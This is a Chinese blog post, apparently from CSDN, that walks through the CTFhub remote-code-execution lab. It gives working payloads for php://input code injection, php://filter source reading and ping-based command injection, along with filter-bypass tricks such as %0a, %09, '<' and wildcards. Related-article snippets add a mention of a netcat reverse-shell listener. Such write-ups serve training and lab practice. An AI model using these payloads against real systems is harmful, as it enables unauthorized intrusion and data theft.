CTFhub RCE靶场

已于 2024-08-06 09:39:52 修改
阅读量430 收藏 9
点赞数 10
文章标签: 网络安全 安全 安全性测试
于 2024-08-06 09:37:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/140945958
版权

eval执行文件

直接蚁剑连接即可

文件包含

shell.txt内容所以采用文件包含shell.txt,发个POST请求包

得出flag

php://input

靶场环境

观察phpinfo得出需要用php://input

修改发送方法为post,目标修改为/?file=php://input

将body换成<?php system('ls /');?>查看上一级文件

修改body为

<?php system('cat /flag_8987');?> 访问flag

远程包含

靶场环境

可以试着前面的思路去做

读取源代码

靶场环境

发现代码与上题无甚差异

遂构造php://input发现行不通,

那么可能是allow_url_fopen开关是off状态

所以用php://filter

?file=php://filter/read=convert.base64-encode/resource=…/…/…/flag

命令注入

靶场环境

通过管道符,可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令

ping 127.0.0.1 | ls

发现有个php文件,cat一下

过滤cat

先查看目录

过滤cat所以用

more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行

127.0.0.1 & more flag_21019287518443.php

过滤空格

先查看目录

127.0.0.1&ls

<过滤空格

127.0.0.1&cat<flag_128152258530457.php

过滤目录分隔符

127.0.0.1;ls,

发现 flag_is_here

127.0.0.1;cd flag_is_here;ls

发现 flag_8051660913375.php

127.0.0.1;cd flag_is_here;cat flag_8051660913375.php

过滤运算符

和上题步骤一样即可做出

综合过滤练习

在url输入?ip=127.0.0.1%0als#查看上一级文件

lag可以用正则f***

/?ip=1%0acd%09f*%0atac%09fl*

安全beginner
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞之2LFI-Labs中的的利用和绕过
ISNS的博客
03-30 5568
一、环境搭建 1.环境描述 操作系统:win7 PHP集成环境:phpstudy 源码:LFI-Labs(去GitHub上下载) 将下载好的源码放在phpstudy的WWW目录下。 2.解决报错 如图所示,它会出现以下报错: 我找到的相关资料是: 这样的警告,只是一个因为PHP版本不同而产生的警告(NOTICE或者WARNING),而非错误(ERROR)。PHP中的变量在不声明的情况下使用 的...
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 857
CTFHUB-WEB-RCE
RCE以及Upload -lab的小心得
qq_42739469的博客
11-05 96
为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4323
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
初学RCE(远程命令/代码执行漏洞)
热门推荐
qq_43814486的博客
05-09 5万+
RCE英文全称:remote command/code execute 漏洞出现的原因: 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
远程代码执行(RCE)漏洞
谈谈1974
01-09 5196
文章目录1. Fastjson 远程代码执行漏洞2. 简单复现3. shell 反弹 1. Fastjson 远程代码执行漏洞 最近读到一篇文章 Fastjson 远程代码执行漏洞分析 2. 简单复现 攻击机器执行命令 nc -lvvp 9999,监听本机的 9999 端口 目标机器执行以下代码,会新开一个 shell 进程,将自身的输入输出通过 tcp连接传输到攻击者服务器上,从而渗透入侵。以下......
通过ctfhub系统对RCE学习
qq_45584159的博客
12-29 1152
文章目录RCE介绍exce(ping)(远程系统命令执行)一. eval执行函数linux常用的目录操作命令:创建目录:mkdir建空文本文件:touch复制文件:cp移动文件或目录:mv查看文件内容命令:cat删除文件:rm命令注入 RCE介绍 RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户
命令执行(RCE)与反序列化
赤赤三的博客
03-24 5899
命令执行(RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。): 分类: 远程系统命令执行exec()、system()、assert(): 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 涉及系统命令:assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号) .
RCE初学笔记
qq_39670065的博客
11-07 769
RCE英文全称:remote command/code execute 分类:分为远程命令执行ping和远程代码执行evel 还需要注意的是它们是有本质的区别的。命令执行只是针对系统命令,而远程代码执行针对的是编程代码,两者互不能替换 漏洞出现的原因:没有在输入口做输入处理 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者
攻防系列——板块化刷题记录(敏感信息泄露)
weixin_43140411的博客
10-29 2160
因为之前通关了两个靶场,说想试一下在线靶场联系一下。其实感觉思路还是很有限。遇到难题可怎么办呜呜
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 722
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 504
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
最新发布
weixin_71529930的博客
09-10 733
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1700
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 869
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1414
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
【游戏安全】CheatEngine基础使用——如何对不同类型的数值进行搜索?如何破解数值加密找到想修改的数值?
m0_62783065的博客
09-04 458
【游戏安全】CheatEngine基础使用——如何对不同类型的数值进行搜索?如何破解数值加密找到想修改的数值?
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值